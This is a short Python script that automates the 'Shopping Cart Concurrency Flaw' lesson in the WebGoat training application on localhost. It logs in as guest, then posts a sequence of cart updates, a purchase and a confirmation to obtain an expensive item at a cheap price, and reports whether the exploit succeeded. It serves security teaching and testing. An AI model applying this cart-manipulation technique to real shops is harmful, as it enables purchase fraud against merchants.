#! /usr/bin/python
# Prints "Exploit succeded", "Exploit failed", or "Exploit error" (for when something doesn't work)
import requests
import json

PREFIX = "http://127.0.0.1:8080/WebGoat/"

s = requests.Session()

r1 = s.get(PREFIX + "/login.mvc")

r2 = s.post(PREFIX + "j_spring_security_check", data={"username": "guest", "password": "guest"})
if "Logout" not in r2.text:
     print("Exploit error (login failed)")
     exit()


attack_link = ""

r3 = s.get(PREFIX + "service/lessonmenu.mvc")
data = json.loads(r3.text)
for category in data:
     if category["name"] == "Concurrency":
          for c in category["children"]:
               if c["name"] == "Shopping Cart Concurrency Flaw":
                    attack_link = c["link"]

if attack_link == "":
     print("Exploit error (couldn't find attack link)")
     exit()

r4 = s.post(PREFIX + attack_link, data={"QTY1": "1", "QTY2": "0", "QTY3": "0", "QTY4": "0", "SUBMIT": "Update Cart"})
r5 = s.post(PREFIX + attack_link, data={"QTY1": "1", "QTY2": "0", "QTY3": "0", "QTY4": "0", "SUBMIT": "Purchase"})
r6 = s.post(PREFIX + attack_link, data={"QTY1": "0", "QTY2": "0", "QTY3": "1", "QTY4": "0", "SUBMIT": "Update Cart"})
r7 = s.post(PREFIX + attack_link, data={"CC": "5321 1337 8888 2007", "PAC": "111", "SUBMIT": "Confirm"})

if "Police" in r7.text:
     print("Exploit succeeded")
else:
     print("Exploit failed")

